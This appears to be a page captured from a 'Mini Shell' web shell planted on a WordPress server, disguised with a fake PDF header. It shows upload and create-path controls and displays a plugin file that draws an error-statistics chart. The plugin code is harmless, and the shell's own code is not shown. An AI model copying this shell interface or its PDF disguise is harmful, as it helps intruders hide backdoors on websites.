%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/komfo908/www/inauguracao/wp-content/plugins/wptools/dashboard/
Upload File :
Create Path :
Current File : /home/komfo908/www/inauguracao/wp-content/plugins/wptools/dashboard/errorsgraph.php

<?php
if (!defined('ABSPATH'))
    exit; // Exit if accessed directly

$wptools_empty = false;   
include("calcula_stats.php");

if($wptools_empty){
  echo esc_attr__( 'No errors have been caught yet. Please bear with us as we work on it. Feel free to check back later.','wptools');
  return;
}

echo '<script type="text/javascript">';
echo 'jQuery(function() {';

    echo 'var d2 = [';
    for($i=0; $i<7; $i++)
    {
        echo '[';
        echo esc_attr($i);
        echo ',';
        echo esc_attr($array7[$i]);
        echo ']';
        if($i < 6)
          echo ',';
    }
    echo '];';

    echo 'var ticks = [';
  for($i=0; $i<7; $i++)
  {
      echo '[';
      echo esc_attr($i);
      echo ',';
      echo esc_attr(substr($array7d[$i],2));
      echo ']';
      if($i < 6)
        echo ',';
  }
  echo '];';
  ?>

  var options = {
      series: {
          lines: { show: true },
          points: { show: true },
          color: "#ff0000"
      },
      grid: {
          hoverable: true,
          clickable: true,
          borderColor: "#CCCCCC",
          color: "#333333",
          backgroundColor: { colors: ["#fff", "#eee"] }
      },
      xaxis: {
          font: {
              size: 8,
              style: "italic",
              weight: "bold",
              family: "sans-serif",
              color: "#616161",
              variant: "small-caps"
          },
          ticks: ticks,
      },
      yaxis: {
          font: {
              size: 10,
              style: "italic",
              weight: "bold",
              family: "sans-serif",
              color: "#616161",
              variant: "small-caps"
          },
          ticks: <?php echo esc_js(wp_json_encode(array_values(array_unique($array7)))); ?>,
          tickFormatter: function suffixFormatter(val, axis) {
              return (val.toFixed(0));
          }
      }
  };

  <?php
echo 'jQuery.plot("#placeholder", [ d2 ], options);';
echo 'jQuery("#placeholder .tickLabel").css({ "width": "60px", "padding": "10px 0" });';
echo 'jQuery("#placeholder").css("max-width","50% !important");';
echo '});';
echo '</script>';
echo '<div id="placeholder" style="max-width:100% !important;height:185px; margin-top: -20px;"></div>';
?>

Zerion Mini Shell 1.0